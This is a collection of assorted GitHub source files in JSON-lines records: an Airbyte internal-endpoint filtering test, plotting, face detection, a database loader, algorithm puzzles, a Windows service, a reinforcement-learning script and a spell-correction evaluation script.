pytest.param(\"cloud\", \"https://192.168.27.30\", ValueError, id=\"test_case_insensitive_cloud_environment_variable\"),\n pytest.param(\"OSS\", \"https://airbyte.com\", None, id=\"test_oss_public_endpoint_is_successful\"),\n pytest.param(\"OSS\", \"https://192.168.27.30\", None, id=\"test_oss_private_endpoint_is_successful\"),\n pytest.param(\"OSS\", \"https://localhost:8080/api/v1/cast\", None, id=\"test_oss_private_endpoint_is_successful\"),\n pytest.param(\"OSS\", \"http://past.lives.net/api/v1/inyun\", None, id=\"test_oss_unsecured_endpoint_is_successful\"),\n ],\n)\n@patch.object(requests.Session, \"send\", lambda self, request, **kwargs: requests.Response())\ndef test_filter_internal_requests(deployment_mode, url, expected_error):\n with mock.patch.dict(os.environ, {\"DEPLOYMENT_MODE\": deployment_mode}, clear=False):\n AirbyteEntrypoint(source=MockSource())\n\n session = requests.Session()\n\n prepared_request = requests.PreparedRequest()\n prepared_request.method = \"GET\"\n prepared_request.headers = {\"header\": \"value\"}\n prepared_request.url = url\n\n if expected_error:\n with pytest.raises(expected_error):\n session.send(request=prepared_request)\n else:\n actual_response = session.send(request=prepared_request)\n assert isinstance(actual_response, 
requests.Response)\n","repo_name":"airbytehq/airbyte","sub_path":"airbyte-cdk/python/unit_tests/test_entrypoint.py","file_name":"test_entrypoint.py","file_ext":"py","file_size_in_byte":12872,"program_lang":"python","lang":"en","doc_type":"code","stars":12323,"dataset":"github-code","pt":"35"} +{"seq_id":"30731504869","text":"\"\"\"\nThis is the source file for the example spectrum. It has the dependencies of\nusing LaTeX with matplotlib. (See https://matplotlib.org/users/usetex.html) If\na LaTeX independent version is desired, simply comment out the line\nplt.rc('text', usetex=True)\n\"\"\"\n\nimport os\nimport re\n\nimport matplotlib.pyplot as plt\n\nimport lrspectrum\n\n\n# Get multiple logfiles\nlglst = []\nfor fil in os.listdir('.'):\n rexp = re.compile('example_\\d.log')\n if rexp.match(fil) is not None:\n lglst.append(fil)\n\nlr = lrspectrum.LRSpectrum(lglst)\nlr.gen_spect(broad=1.0, wlim=(1530, 1570), res=200)\n\n# Plotting options\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\nplt.rc('xtick', top=True, direction='in')\nplt.rc('xtick.major', size=4.5, pad=7)\nplt.rc('xtick.minor', visible=True)\nplt.rc('ytick', right=True, direction='in')\nplt.rc('ytick.major', size=4.5)\nplt.rc('ytick.minor', visible=True)\n\nf, ax = plt.subplots(figsize=(4.25, 3.25))\nlr.plot(ax=ax, xlim=(1555, 1575), xshift=23, ylabel='Intensity (Arb.)',\n xlabel='Energy (eV)', yscale=1000, sticks=False, ylim=(0, 3), ls='-',\n c='k', lw=1.5)\n# Doing labels outside for fontsize\nax.set_xlabel('Energy (eV)', fontsize=14)\nax.set_ylabel('Intensity (Arb.)', fontsize=14)\n'''\nax.set_xticklabels(['1555', '', '1556', '', '1557', '', '1558', '', '1559', '',\n '1560', '', '1561', '', '1562', '', '1563', '', '1564', '',\n '1565', '', '1566', '', '1567', '', '1568', '', '1569', '',\n '1570']\n ) \n'''\nax.set_xticklabels([str(i) for i in range(1555, 1571)])\nax.set_title('Calculated Aluminum K-Edge', fontsize=16, fontweight='bold')\nplt.tight_layout()\nplt.savefig('aluminumKedge.png', dpi=500)\nplt.show()\n","repo_name":"awild82/lrspectrum","sub_path":"doc/media/example_graph.py","file_name":"example_graph.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"18037319669","text":"import kivy\nfrom kivy.app import App\nfrom kivy.uix.button import Button\nfrom kivy.uix.image import Image\nfrom kivy.uix.widget import Widget\nfrom kivy.config import Config \nfrom socket import *\nfrom kivy.graphics import Rectangle\n\nf1,f2,f3 = False, False, False\n\nclass testWidget(Widget):\n\tdef on_touch_down(self,touch):\n\t\tglobal f1,f2,f3\n\t\tif 'markerid' in touch.profile:\n\t\t\tif touch.fid==2:\n\t\t\t\tf1=True\n\t\t\t\tprint(\"yes1\")\n\t\t\t\t\n\t\t\tif touch.fid==4:\n\t\t\t\tf2=True\n\t\t\t\tprint(\"yes2\")\n\t\t\t\t\n\t\t\tif f1 and f2:\n\t\t\t\twith self.canvas.before:\n\t\t\t\t\tRectangle(source=\"Map2.jpg\",pos=self.pos,size=self.size)\nclass Shortest_pathApp(App):\n\tdef build(self):\n\t\tConfig.set('input','fid1','tuio,0.0.0.0:3333')\n\t\treturn testWidget()\n\n\t\nif __name__ == '__main__':\n\tShortest_pathApp().run()\n","repo_name":"aliasgar521/KivyProject","sub_path":"Shortest path/shortest_path.py","file_name":"shortest_path.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"897632162","text":"import cv2, os\n\ncascPath = 
r\"C:\\Users\\Administrator\\Desktop\\FaceDetection\\haarcascade_frontalface_default.xml\"\nfaceCascade = cv2.CascadeClassifier(cascPath)\n\nlive = cv2.VideoCapture(0)\n\nwhile True:\n # Capture frame-by-frame\n ret, frame = live.read()\n\n # Converting frame to grayscale\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # using haarcascade\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(1,1),\n flags = cv2.CASCADE_SCALE_IMAGE)\n\n os.system(\"cls\")\n print(\"Detected {0} faces!\".format(len(faces)))\n\n\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n cv2.imshow(\"Faces Detected\", frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Release the capture\nlive.release()\ncv2.destroyAllWindows()","repo_name":"karan10072002/face_detection","sub_path":"face_detection.py","file_name":"face_detection.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"44052922959","text":"__author__ = 'mirko'\n\nfrom sklearn.externals import joblib\nfrom Tweet import make_tweet\nimport os.path\nimport pymysql\nimport config as cfg\n\nclass Database_manager(object):\n\n db=None\n cur=None\n\n def __init__(self):\n\n self.db = pymysql.connect(host=cfg.mysql['host'],\n user=cfg.mysql['user'],\n passwd=cfg.mysql['passwd'],\n db=cfg.mysql['db'],\n charset='utf8')\n self.cur = self.db.cursor()\n self.cur.execute('SET NAMES utf8mb4')\n self.cur.execute(\"SET CHARACTER SET utf8mb4\")\n self.cur.execute(\"SET character_set_connection=utf8mb4\")\n self.db.commit()\n\n def return_test(self):\n\n\n if os.path.isfile('test.pkl') :\n tweets= joblib.load('test.pkl')\n return tweets\n\n\n tweets=[]\n self.cur.execute(\" SELECT `id`, `content`, `language`, `stance`, `gender` \"\n \" FROM `test \")\n i=0\n for tweet in self.cur.fetchall():\n i+=1\n id=tweet[0]\n content=tweet[1]\n language=tweet[2]\n stance=tweet[3]\n gender=tweet[4]\n\n\n this_tweet=make_tweet(id, content,language, stance, gender )\n\n tweets.append(this_tweet)\n\n joblib.dump(tweets, 'test.pkl')\n\n return tweets\n\n\n\n def return_training(self, language=None):\n\n if language==\"ca\" or language==\"es\":\n filter=\" where language='\"+language+\"'\"\n else:\n filter=\"\"\n\n\n if os.path.isfile('training'+filter+'.pkl') :\n tweets= joblib.load('training'+filter+'.pkl')\n return tweets\n\n\n tweets=[]\n\n\n self.cur.execute(\" SELECT `id`, `content`, `language`, `stance`, `gender` \"\n \" FROM `training` \"+filter)\n i=0\n for tweet in self.cur.fetchall():\n i+=1\n id=tweet[0]\n content=tweet[1]\n language=tweet[2]\n stance=tweet[3]\n gender=tweet[4]\n\n\n this_tweet=make_tweet(id, content,language, stance, gender )\n\n tweets.append(this_tweet)\n\n joblib.dump(tweets, 'training'+filter+'.pkl')\n\n return tweets\n\n\n\n\n\ndef make_database_manager():\n database_manager = Database_manager()\n\n return database_manager\n\n\nif __name__ == '__main__':\n database_manager = Database_manager()\n tweets=database_manager.return_training()\n\n","repo_name":"mirkolai/iTACOS-at-IberEval2017","sub_path":"Database_manager.py","file_name":"Database_manager.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35706654490","text":"#import libraries\nimport matplotlib.pyplot as plt \nimport pandas as pd\nimport streamlit as st\nimport numpy as np\nimport 
matplotlib\n#matplotlib.use('Agg')\nimport seaborn as sns \n#Remove Warnings\nst.balloons()\nst.set_option('deprecation.showPyplotGlobalUse', False)\nst.title(\"District_Level_School_Dataset\")\n\n#import dataset\ndf = pd.read_csv('DistrictLevelData_V3.csv')\n\n#First thirty rows\nattendance = df.head(30)\n#Display the table\nst.table(attendance)\nst.header(\"Visualisation Using Seaborn\")\n#bar plot\nst.subheader(\"Bar Plot\")\nattendance.plot(kind='bar')\nst.pyplot()\n#pairplot\nst.subheader(\"Pairplot\")\nsns.pairplot(attendance,)\nst.pyplot()\n#Displot\nst.subheader(\"Displot\")\nsns.displot(attendance['CovidTotalStateCases'])\nst.pyplot()\n#jointplot\nst.subheader(\"JointPlot\")\nsns.jointplot(x='Mem',y='AttendancePercent',data=attendance,kind='hex',color=\"#4CB391\")\nst.pyplot()\n\n#Correlation\nst.subheader(\"Heatmap\")\nsns.heatmap(attendance.corr(),cmap='coolwarm',annot=True)\nst.pyplot()\n#Relplot\nst.subheader(\"RelPlot\")\nsns.relplot(x='CovidTotalStateCases',y='CovidTotalCountyCases',hue='Weekday', data=attendance)\nst.pyplot()\n\n ","repo_name":"sangeethar25/geeth_assignment","sub_path":"school.py","file_name":"school.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4957267266","text":"# print factorials in Python language. R. Brown, 9/2010\n# (the original header said \"square roots\" and imported math.sqrt, leftovers from an earlier version)\n\ndef factorial(x):\n\tresult=1\n\ti=1\n\twhile (i>=1 and i<(x+1)):\t# use the parameter x; the original read the global n by accident\n\t\tresult=result*i\n\t\ti=i+1\n\n\treturn result\n\nprint(\"n\\tn!\\n----------------\")\nn=0\nwhile (n<6):\n    print(n,\"\\t\",factorial(n))\n    n=n+1","repo_name":"kalapathar/hardware_design","sub_path":"hw7/facts.py","file_name":"facts.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26902080174","text":"import os\nimport subprocess\nimport copy \nimport socket\nimport win32serviceutil\n\nimport servicemanager\nimport win32event\nimport win32service\nimport sys\nfrom winreg import *\nimport winreg\n\nfrom loggers import logger\n\n# get path from registry stored for the application by the installer\n\nWORKING_DIR = os.path.abspath(__file__)\nlogger.info(WORKING_DIR) \n\n\nENVIRONMENT = copy.deepcopy(os.environ)\n\n\nclass SalesOrderBookService(win32serviceutil.ServiceFramework):\n    _svc_name_ = \"SalesOrderBookService\"\n    _svc_display_name_ = \"SALES_ORDER_BOOK_SERVICE\"\n    _svc_description_ = \"Pushes sales order book changes every hour\"\n\n\n    @classmethod\n    def parse_command_line(cls):\n        win32serviceutil.HandleCommandLine(cls)\n\n    def __init__(self, *args):\n        super().__init__(*args)\n        self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)\n        socket.setdefaulttimeout(60)\n\n    def SvcStop(self):\n        self.stop()\n        self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n        win32event.SetEvent(self.hWaitStop)\n\n    def SvcDoRun(self):\n        self.start()\n        servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE,\n                              servicemanager.PYS_SERVICE_STARTED,\n                              (self._svc_name_, ''))\n        self.main()\n\n    def start(self):\n        logger.info(\"starting service\")\n\n    def stop(self):\n        logger.info(\"stopping service\")\n\n\n    def main(self):\n        logger.info(\"running service\")\n        subprocess.Popen(['python', 'main.py'], env=ENVIRONMENT)\n\nif __name__ == \"__main__\":\n    if len(sys.argv) == 1:\n        servicemanager.Initialize()\n        servicemanager.PrepareToHostSingle(SalesOrderBookService)\n        servicemanager.StartServiceCtrlDispatcher()\n    else:\n        
win32serviceutil.HandleCommandLine(SalesOrderBookService)","repo_name":"nakamura9/sync_service","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38427395931","text":"\"\"\"\nA city is represented by a bidirectionally connected graph with n vertices numbered from 1 to n (inclusive). The edges of the graph are given as a 2D integer array edges, where each edges[i] = [ui, vi] denotes a bidirectional edge between vertex ui and vertex vi. Every pair of vertices is connected by at most one edge, and no vertex has an edge to itself. Crossing any edge takes time minutes.\n\nEvery vertex has a traffic signal that switches between green and red every change minutes, and all signals switch at the same time. You can enter a vertex at any time, but you can only leave a vertex while its signal is green. You cannot wait at a vertex while its signal is green - you must leave.\n\nThe second minimum value is the smallest value that is strictly larger than the minimum.\n    For example, the second minimum of [2, 3, 4] is 3, while the second minimum of [2, 2, 4] is 4.\n\nGiven n, edges, time and change, return the second shortest time needed to go from vertex 1 to vertex n.\n\nNotes:\n    You may pass through any vertex any number of times, including 1 and n.\n    You may assume that all signals have just turned green when you start.\n\nExample 1:\n    Input: n = 5, edges = [[1,2],[1,3],[1,4],[3,4],[4,5]], time = 3, change = 5\n    Output: 13\n    Explanation:\n    The minimum-time path (the blue path in the original figure) takes:\n    - start at vertex 1, total elapsed time = 0\n    - 1 -> 4: 3 minutes, total elapsed time = 3\n    - 4 -> 5: 3 minutes, total elapsed time = 6\n    so the minimum time needed is 6 minutes.\n\n    The second-minimum-time path (the red path in the original figure) takes:\n    - start at vertex 1, total elapsed time = 0\n    - 1 -> 3: 3 minutes, total elapsed time = 3\n    - 3 -> 4: 3 minutes, total elapsed time = 6\n    - wait 4 minutes at vertex 4, total elapsed time = 10\n    - 4 -> 5: 3 minutes, total elapsed time = 13\n    so the second shortest time is 13 minutes.\n\nExample 2:\n    Input: n = 2, edges = [[1,2]], time = 3, change = 2\n    Output: 11\n    Explanation:\n    The minimum-time path is 1 -> 2, total time = 3 minutes.\n    The second-minimum-time path is 1 -> 2 -> 1 -> 2, total time = 11 minutes.\n\nConstraints:\n    2 <= n <= 10^4\n    n - 1 <= edges.length <= min(2 * 10^4, n * (n - 1) / 2)\n    edges[i].length == 2\n    1 <= ui, vi <= n\n    ui != vi\n    there are no duplicate edges\n    every vertex can be reached from every other vertex, directly or indirectly\n    1 <= time, change <= 10^3\n\n\"\"\"\nfrom typing import List\nfrom collections import deque\n\nclass Solution:\n    def secondMinimum(self, n: int, edges: List[List[int]], time: int, change: int) -> int:\n        graph = [[] for _ in range(n + 1)]\n        for e in edges:\n            x, y = e[0], e[1]\n            graph[x].append(y)\n            graph[y].append(x)\n\n        # dist[i][0] is the shortest-path length (in edges) from 1 to i; dist[i][1] is the strictly second-shortest length\n        dist = [[float('inf')] * 2 for _ in range(n + 1)]\n        dist[1][0] = 0\n        q = deque([(1, 0)])\n        while dist[n][1] == float('inf'):\n            p = q.popleft()\n            for y in graph[p[0]]:\n                d = p[1] + 1\n                if d < dist[y][0]:\n                    dist[y][0] = d\n                    q.append((y, d))\n                elif dist[y][0] < d < dist[y][1]:\n                    dist[y][1] = d\n                    q.append((y, d))\n\n        ans = 0\n        for _ in range(dist[n][1]):\n            if ans % (change * 2) >= change:  # red light: wait for the start of the next green window\n                ans += change * 2 - ans % (change * 2)\n            ans += time\n        return ans\n\nif __name__ == \"__main__\":\n    n = 5\n    edges = [[1,2],[1,3],[1,4],[3,4],[4,5]]\n    time = 3\n    change = 5\n    sol = Solution()\n    result = sol.secondMinimum(n, edges, time, change)\n    print(result)","repo_name":"jasonmayday/LeetCode","sub_path":"leetcode_algorithm/3_hard/2045_到达目的地的第二短时间.py","file_name":"2045_到达目的地的第二短时间.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"74113258980","text":"#!/usr/bin/env python3\n\nimport gym\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.contrib.layers import *\nimport sys\n\nenv = gym.make('CartPole-v0')\n\nRNG_SEED = 1\ntf.set_random_seed(RNG_SEED)\nenv.seed(RNG_SEED)\n\nalpha = 0.0001\ngamma = 0.99\n\nw_init = xavier_initializer(uniform=False)\nb_init = tf.constant_initializer(0.1)\n\ntry:\n    output_units = env.action_space.shape[0]\nexcept AttributeError:\n    output_units = env.action_space.n\n\ninput_shape = env.observation_space.shape[0]\nNUM_INPUT_FEATURES = 4\nx = tf.placeholder(tf.float32, shape=(None, NUM_INPUT_FEATURES), name='x')\ny = tf.placeholder(tf.float32, shape=(None, output_units), 
name='y')\n\nout = fully_connected(inputs=x,\n num_outputs=output_units,\n activation_fn=tf.nn.softmax,\n weights_initializer=w_init,\n weights_regularizer=None,\n biases_initializer=b_init,\n scope='fc')\n\nall_vars = tf.global_variables()\n\npi = tf.contrib.distributions.Bernoulli(p=out, name='pi')\npi_sample = pi.sample()\nlog_pi = pi.log_prob(y, name='log_pi')\n\nReturns = tf.placeholder(tf.float32, name='Returns')\noptimizer = tf.train.GradientDescentOptimizer(alpha)\ntrain_op = optimizer.minimize(-1.0 * Returns * log_pi)\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nMEMORY = 25\nMAX_STEPS = env.spec.tags.get('wrapper_config.TimeLimit.max_episode_steps')\n\n\ntrack_steps = []\ntrack_returns = []\n\n# For LaTeX plotting\nw1_plot = ''\nw2_plot = ''\nw3_plot = ''\nw4_plot = ''\nw5_plot = ''\nw6_plot = ''\nw7_plot = ''\nw8_plot = ''\nreturns_plot = ''\nsteps_plot = ''\n\nfor ep in range(2001):\n obs = env.reset()\n\n G = 0\n ep_states = []\n ep_actions = []\n ep_rewards = [0]\n done = False\n t = 0\n I = 1\n while not done:\n ep_states.append(obs)\n env.render()\n action = sess.run([pi_sample], feed_dict={x: [obs]})[0][0]\n ep_actions.append(action)\n obs, reward, done, info = env.step(action[0])\n ep_rewards.append(reward * I)\n G += reward * I\n I *= gamma\n\n t += 1\n if t >= MAX_STEPS:\n break\n\n returns = np.array([G - np.cumsum(ep_rewards[:-1])]).T\n index = ep % MEMORY\n\n print(np.array(ep_states))\n\n _ = sess.run([train_op], feed_dict={x: np.array(ep_states),\n y: np.array(ep_actions),\n Returns: returns})\n\n track_steps.append(t)\n track_steps = track_steps[-MEMORY:]\n mean_steps = np.mean(track_steps)\n\n track_returns.append(G)\n track_returns = track_returns[-MEMORY:]\n mean_return = np.mean(track_returns)\n\n print(\"Episode {} finished after {} steps with return {}\".format(ep, t, G))\n print(\"Mean return over the last {} episodes is {}\".format(MEMORY, mean_return))\n print(\"Mean number of steps over the last {} episodes is {}\".format(MEMORY, mean_steps))\n\n with tf.variable_scope('fc', reuse=True):\n weights = sess.run(tf.get_variable('weights'))\n print(\"Weights:\")\n print(weights)\n\n if ep % 20 == 0:\n w1_plot += str((ep, weights[0, 0]))\n w2_plot += str((ep, weights[0, 1]))\n w3_plot += str((ep, weights[1, 0]))\n w4_plot += str((ep, weights[1, 1]))\n w5_plot += str((ep, weights[2, 0]))\n w6_plot += str((ep, weights[2, 1]))\n w7_plot += str((ep, weights[3, 0]))\n w8_plot += str((ep, weights[3, 1]))\n returns_plot += str((ep, mean_return))\n steps_plot += str((ep, mean_steps))\n\nprint('w1:', w1_plot)\nprint('w2:', w2_plot)\nprint('w3:', w3_plot)\nprint('w4:', w4_plot)\nprint('w5:', w5_plot)\nprint('w6:', w6_plot)\nprint('w7:', w7_plot)\nprint('w8:', w8_plot)\nprint('returns:', returns_plot)\nprint('steps:', steps_plot)\n\nsess.close()\n","repo_name":"azmsu/reinforcement-learning","sub_path":"cartpole-reinforce.py","file_name":"cartpole-reinforce.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22802606247","text":"#!../python35/python.exe\nprint (\"Content-type: text/html\\n\")\nimport cgi\nimport cgitb; cgitb.enable()\nform = cgi.FieldStorage()\nnombre = form.getfirst(\"nombre\");\ndificuldad = form.getfirst(\"dificuldad\");\npocision = form.getfirst(\"pocision\");\nelementos = form.getfirst(\"elementos\");\nreloj = form.getfirst(\"reloj\");\ntiempo_juego = form.getfirst(\"tiempo_juego\");\ntiempo_jugada = 
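# Sketch (editorial aside, not part of any record): the REINFORCE script above
# builds per-step returns as G - cumsum of the discounted reward increments.
# This helper shows the same reward-to-go computation in isolation; only NumPy
# is assumed.
import numpy as np

def rewards_to_go(increments):
    # increments[t] = reward_t * gamma**t, so G = increments.sum()
    increments = np.asarray(increments, dtype=float)
    G = increments.sum()
    return G - np.concatenate(([0.0], np.cumsum(increments[:-1])))

assert np.allclose(rewards_to_go([1.0, 0.5, 0.25]), [1.75, 0.75, 0.25])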
form.getfirst(\"tiempo_jugada\");\ntiempo_multinivel = form.getfirst(\"tiempo_multinivel\");\n\n\ncolor = form.getfirst(\"fcolor\");\n\n\nconfig = open(\"datos/config.dat\",\"w\")\n\nconfig.write(nombre+\",\"+dificuldad+\",\"+pocision+\",\"+elementos+\",\"+reloj+\",\"+tiempo_jugada+\",\"+tiempo_juego+\",\"+tiempo_multinivel+\",\"+color)\n\nprint('''''')","repo_name":"cecilianogranados96/Proyecto-Iphone","sub_path":"MasterMind/process_config.py","file_name":"process_config.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"44309123973","text":"### this script converts a config.dat file to produce the output files 'mycal.in' and 'radius.dat'.\n\nimport numpy as np\nimport pandas as pd\n\ndf=pd.read_csv('config.dat',header=None,skiprows=0)\n\nradius=df.iloc[0].tolist()[0].split()[-3]\n\nf=open('radius.dat','w')\nf.write(str(radius+'\\n'))\nf.close()\n\nf=open('mycal.in','w')\nf.write('** total number of variables'+'\\n')\nf.write('** data begins from line 27 and onwards'+'\\n')\nf.write('** the rest are all dummies'+'\\n')\n\nfor i in range(4,27):\n    f.write('**'+'\\n')\n    \ncount=0 \nfor i in range(len(df)):\n    line=df.iloc[i].tolist()[0]\n    x=line.split()[0]\n    y=line.split()[1]\n    z=line.split()[2]\n    count=count+1;\n    state='variable '+ str(count) + ' ' + x\n    #print(state)\n    f.write(state+'\\n')\n    \n    count=count+1;\n    #print(count,y);\n    state='variable '+ str(count) + ' ' + y\n    #print(state)\n    f.write(state+'\\n')\n    \n    count=count+1\n    #print(count,z);\n    state='variable '+ str(count) + ' ' + z\n    #print(state)\n    f.write(state+'\\n')\nf.write('end'+'\\n')\t\nf.close()\n \n\n","repo_name":"tlyoon/mock-data-generation","sub_path":"convert_config.dat2mycal.in.py","file_name":"convert_config.dat2mycal.in.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39617524529","text":"from prelogging import LCDict\nimport logging\n\nKEYWORD = 'my_keyword'\n\n# \"class formatter\"\n\nclass MyFormatter(logging.Formatter):\n    def __init__(self, **kwargs):\n        self.value=kwargs.pop(KEYWORD, '')\n        kwargs.pop('class', None)\n        s = super(MyFormatter, self).__init__(**kwargs)\n\n    def format(self, logrecord, *args, **kwds):\n        message = super(MyFormatter, self).format(logrecord, *args, **kwds)\n        return 'MyFormatter [%r: %r] says: %s' % (KEYWORD, self.value, message)\n\n\nif __name__ == '__main__':\n    lcd = LCDict(attach_handlers_to_root=True)\n    lcd.add_formatter( 'my_formatter',\n                       format='%(name)s - %(levelname)s - %(message)s',\n                       # dateformat=...,\n                       # style=?,\n                       ** {'()': MyFormatter,\n                           KEYWORD: 'my_value'} )\n    lcd.add_stdout_handler('out', formatter='my_formatter')\n    lcd.config()\n\n    root = logging.getLogger()\n    root.debug(\"Debug.\")\n    root.info(\"Info.\")\n    root.warning(\"Warning.\")\n    root.error(\"Error.\")\n    root.critical(\"Critical.\")\n    \"\"\"\n    MyFormatter ['my_keyword': 'my_value'] says: root - WARNING - Warning.\n    MyFormatter ['my_keyword': 'my_value'] says: root - ERROR - Error.\n    MyFormatter ['my_keyword': 'my_value'] says: root - CRITICAL - Critical.\n    \"\"\"\n","repo_name":"Twangist/prelogging","sub_path":"examples/custom_class_formatter.py","file_name":"custom_class_formatter.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"} +{"seq_id":"42465381709","text":"import sys\n\ndef candies(n, arr):\n    # Complete this function\n    
candies = [1]*n\n    # forward check\n    for i in range(1, len(arr)):\n        # determine candies[i] by comparison\n        if arr[i] > arr[i-1]:\n            candies[i] = candies[i-1] + 1\n    # backward check\n    for j in range(len(arr)-2, -1, -1):\n        if arr[j] > arr[j+1] and candies[j] <= candies[j+1]:\n            candies[j] = candies[j+1] + 1\n    \n    return sum(candies)\n\nif __name__ == \"__main__\":\n    n = int(input().strip())\n    arr = []\n    arr_i = 0\n    for arr_i in range(n):\n        arr_t = int(input().strip())\n        arr.append(arr_t)\n    result = candies(n, arr)\n    print(result)","repo_name":"seLain/codesnippets","sub_path":"python3/hackerrank_leetcode/candies/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72356709222","text":"#!/usr/bin/python3\n# coding=utf-8\n\n''' Measure metrics (5 tests average) from spellcorrector.py, with several operation modes\n\nIndicates several metrics (average) for each operation mode (\"Manual\", Aspell, Hunspell and\nSymspell):\n * True Positives Wrong\n * True Positives Right\n * True Negatives\n * False Positives\n * False Negatives\n * Accuracy\n * Precision\n * Recall\n * Harmonic Mean\n * True Positives Rate\n * False Positives Rate\n * Execution Duration (sec)\n'''\n\nimport sys\nimport time\nimport fileinput\n\nimport regex\nimport numpy as np\nfrom prettytable import PrettyTable\n\nimport spellcorrector\n\ndef is_word(token):\n    \"Indicates if token is a `word`.\"\n    return bool(regex.search(r'\\w+', token, flags=regex.UNICODE))\n\ndef process_token(token):\n    \"Process token.\"\n    if len(token) <= 3:\n        n_changes = np.random.choice([0, 1], p=[3.0/4.0, 1.0/4.0])\n    else:\n        n_changes = np.random.choice([0, 1, 2], p=[3.0/4.0, 0.8/4.0, 0.2/4.0])\n\n    changes = np.random.choice([1, 2, 3, 4], size=(n_changes))\n    for change in changes:\n        if change == 1:    # delete\n            if len(token) > 1:\n                i_rand = np.random.randint(0, len(token))\n                token = token[0:i_rand] + token[i_rand+1:]\n        elif change == 2:  # transposes (i <-> i+1)\n            if len(token) > 1:\n                i_rand = np.random.randint(0, len(token)-1)\n                token = token[0:i_rand] + token[i_rand+1] + token[i_rand] + token[i_rand+2:]\n        elif change == 3:  # replaces\n            i_rand = np.random.randint(0, len(token))\n            new_char = np.random.choice(list('aáàãâbcçdeéèêfghiíìîjklmnoóòõôpqrstuúùûvwxyz' +\\\n                'AÁÀÃÂBCÇDEÉÈÊFGHIÍÌÎJKLMNOÓÒÕÔPQRSTUÚÙÛVWXYZ'))\n            token = token[0:i_rand] + new_char + token[i_rand+1:]\n        else:              # inserts\n            i_rand = np.random.randint(0, len(token))\n            new_char = np.random.choice(list('aáàãâbcçdeéèêfghiíìîjklmnoóòõôpqrstuúùûvwxyz' +\\\n                'AÁÀÃÂBCÇDEÉÈÊFGHIÍÌÎJKLMNOÓÒÕÔPQRSTUÚÙÛVWXYZ'))\n            token = token[0:i_rand] + new_char + token[i_rand:]\n    return token\n\n\ndef gen_text_with_errors(tokens):\n    \"Generate text with errors, from `tokens` list.\"\n    errors_tokens = []\n    for token in tokens:\n        if is_word(token) and len(token) > 1:\n            errors_tokens.append(process_token(token))\n        else:\n            errors_tokens.append(token)\n\n    return ''.join(errors_tokens)\n\n\ndef classification(original_word, errors_word, corrected_word):\n    \"Classify spell correction as TPW, TPR, TN, FP or FN.\"\n    # True Positives\n    if original_word != errors_word and errors_word != corrected_word:\n        # Wrong correction\n        if original_word != corrected_word:\n            return 'TPW'\n        # Right correction\n        return 'TPR'\n    # True Negatives\n    if original_word == errors_word and errors_word == corrected_word:\n        return 'TN'\n    # False Positives\n    if original_word == errors_word and errors_word != corrected_word:\n        return 
'FP'\n    # False Negatives\n    if original_word != errors_word and errors_word == corrected_word:\n        return 'FN'\n    return None\n\n\ndef get_wrong_texts(n_tests, original_tokens):\n    \"Get `n_tests` texts with errors.\"\n    wrong_texts = []\n    with open('metrics_errors.txt', 'w+') as file_desc:\n        for i in range(n_tests):\n            errors_text = gen_text_with_errors(original_tokens)\n            wrong_texts.append(errors_text)\n            print(f'\\n-- TEST {i} --', file=file_desc)\n            print(errors_text, file=file_desc)\n    return wrong_texts\n\n\ndef get_metrics(function_name, id_test, function, original_tokens, errors_text):\n    \"Calculates metrics.\"\n    errors_tokens = regex.findall(r'\\w+|\\s+|\\p{P}+', errors_text, flags=regex.UNICODE)\n\n    # Correct the errors in the text\n    print(f'-- Correcting text errors with function {function_name} - Test {str(id_test)} --',\n          file=sys.stderr)\n    if function_name == 'Manual':\n        time1 = time.time()\n        pos_freq, words_freq = spellcorrector.analyze_large_text()\n        time2 = time.time()\n        corrected_text = spellcorrector.correct_text(pos_freq, words_freq,\n                                                     text_lines=errors_text.split('\\n'))\n        time3 = time.time()\n        duration = (time2-time1, time3-time2)\n    else:\n        time1 = time.time()\n        corrected_text = spellcorrector.correct_text_ext(errors_text.split('\\n'), function)\n        time2 = time.time()\n        duration = time2-time1\n\n    corrected_tokens = regex.findall(r'\\w+|\\s+|\\p{P}+', 